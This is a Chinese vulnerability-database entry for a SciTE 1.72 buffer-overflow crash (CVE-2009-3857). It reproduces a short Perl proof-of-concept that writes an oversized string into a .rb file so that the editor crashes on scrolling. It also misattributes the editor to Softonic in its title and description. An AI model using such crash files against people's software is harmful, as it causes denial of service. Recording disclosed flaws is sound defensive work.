Softonic Scite 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118103 漏洞类型 缓冲区溢出
发布时间 2009-07-13 更新时间 2009-07-13
CVE编号 CVE-2009-3857 CNNVD-ID CNNVD-200911-037
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/9133
https://www.securityfocus.com/bid/43612
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200911-037
|漏洞详情
SoftonicScite时一个文本编辑器,常用于开发和运行程序。SoftonicInternationalScite1.72中存在缓冲区溢出漏洞。远程攻击者可以借助一个包含长字符串的Ruby(.rb)文件来触发缓冲区溢出(当使用滚动条时),引起拒绝服务攻击(应用程序崩溃)。
|漏洞EXP
#!/usr/bin/perl
#
#######################################################################
#
#                    ScITE Editor 1.72 crash vulnerability Exploit
#            
########################################################################
#
#		          Bug Founded by prodigy
#
########################################################################

# ###                                 PoC                           ### #

############################################################################################
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open(myfile,'>>crash.rb');
print myfile $owned;
close(myfile);
############################################################################################

[!]Usage: when you created the file is open with SciTE, and move the scroll bars

############################################################################################

#Greetz: Greetz myself for find the bug, and all the people of undersecurity.net

##########################################################################################

# milw0rm.com [2009-07-13]
|受影响的产品
Scintilla SciTE 1.72
|参考资料

来源:XF
名称:scite-editor-file-dos(51674)
链接:http://xforce.iss.net/xforce/xfdb/51674
来源:MILW0RM
名称:9133
链接:http://www.milw0rm.com/exploits/9133